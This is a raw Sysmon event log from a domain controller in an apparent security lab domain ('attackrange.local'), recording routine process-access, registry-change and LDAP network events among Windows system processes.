12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0F00-00000000AE01}11161508C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE38DF8BF8C0B468DD107B039B5FA1E,SHA256=5B63EC5A41A8B0771F6D8C8677A5F1ECE2011F190E00FCDFCDB671427552C66F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.030{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.030{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.961{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.961{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.720{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53570-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.720{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53570-false10.0.1.14win-dc-892.attackrange.local389ldap 13241300x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 